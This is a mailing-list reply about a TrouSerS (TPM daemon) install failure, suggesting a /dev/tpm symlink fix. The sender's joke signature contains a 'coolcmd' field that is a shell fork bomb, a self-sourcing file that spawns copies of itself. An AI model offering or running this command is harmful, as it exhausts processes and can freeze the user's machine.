On 4 March 2014 15:57, Robert Sutton II <[email protected]> wrote:

> * Starting Trusted Computing daemon tcsd    /etc/init.d/trousers: 32: [: 
> /dev/tpm: unexpected operator [fail]
> invoke-rc.d: initscript trousers, action "start" failed.
> dpkg: error processing trousers (--configure):
>  subprocess installed post-installation script returned error exit status 2
> E: Sub-process /usr/bin/dpkg returned an error code (1)
>
>
I've had this fail when /dev/tpm didn't exist, but /dev/tpm0 did. Or vice
versa, I don't remember. It may be the same error.

Do ls -l /dev/tpm* and see if either exists. If one does, create a symlink
for the other to point to it.

-- 
typedef struct me_s {
 char name[]      = { "Thomas Habets" };
 char email[]     = { "[email protected]" };
 char kernel[]    = { "Linux" };
 char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt"; };
 char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
 char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
------------------------------------------------------------------------------
Subversion Kills Productivity. Get off Subversion & Make the Move to Perforce.
With Perforce, you get hassle-free workflows. Merge that actually works. 
Faster operations. Version large binaries.  Built-in WAN optimization and the
freedom to use Git, Perforce or both. Make the move to Perforce.
http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk
_______________________________________________
TrouSerS-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/trousers-users

Reply via email to